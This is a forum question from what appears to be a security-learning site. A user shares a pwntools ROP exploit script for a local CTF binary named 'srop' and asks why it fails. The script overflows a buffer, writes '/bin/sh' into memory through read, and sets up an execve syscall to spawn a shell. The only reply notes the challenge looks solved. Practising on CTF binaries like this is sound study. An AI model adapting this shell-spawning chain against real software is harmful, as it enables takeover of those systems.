완료됨
not working?
답변 1 · 추천 0 · 조회 279
SigReturn-Oriented Programming

Can anyone help me my code is not working?

from pwn import *

context.binary = exe = ELF('./srop', checksec = False)
context.log_level = 'debug'

p = process(exe.path)

syscall = 0x00000000004004ec
binsh = 0x0000000000601a00
pop_rdi = 0x0000000000400583
pop_rax_sys = 0x00000000004004eb
pop_rsi_r15 = 0x0000000000400581

payload = b'A'*0x18
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi_r15) + p64(binsh) + p64(0)
payload += p64(exe.sym['read'])
payload += p64(pop_rdi) + p64(binsh)
payload += p64(pop_rsi_r15) +p64(0) + p64(0)
payload += p64(pop_rax_sys) + p64(0x3b)
input()
p.send(payload)

sleep(1)

p.send(b'/bin/sh\0')

p.interactive()

#pwnable
2024.04.21. 14:50
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
구독하고 Q&A Ticket 시작하기
답변 1
kimht
공부벌레
kimht
공부벌레

It appears that you have already solved the challenge, so I will mark this question as answered.

2024.04.29. 18:10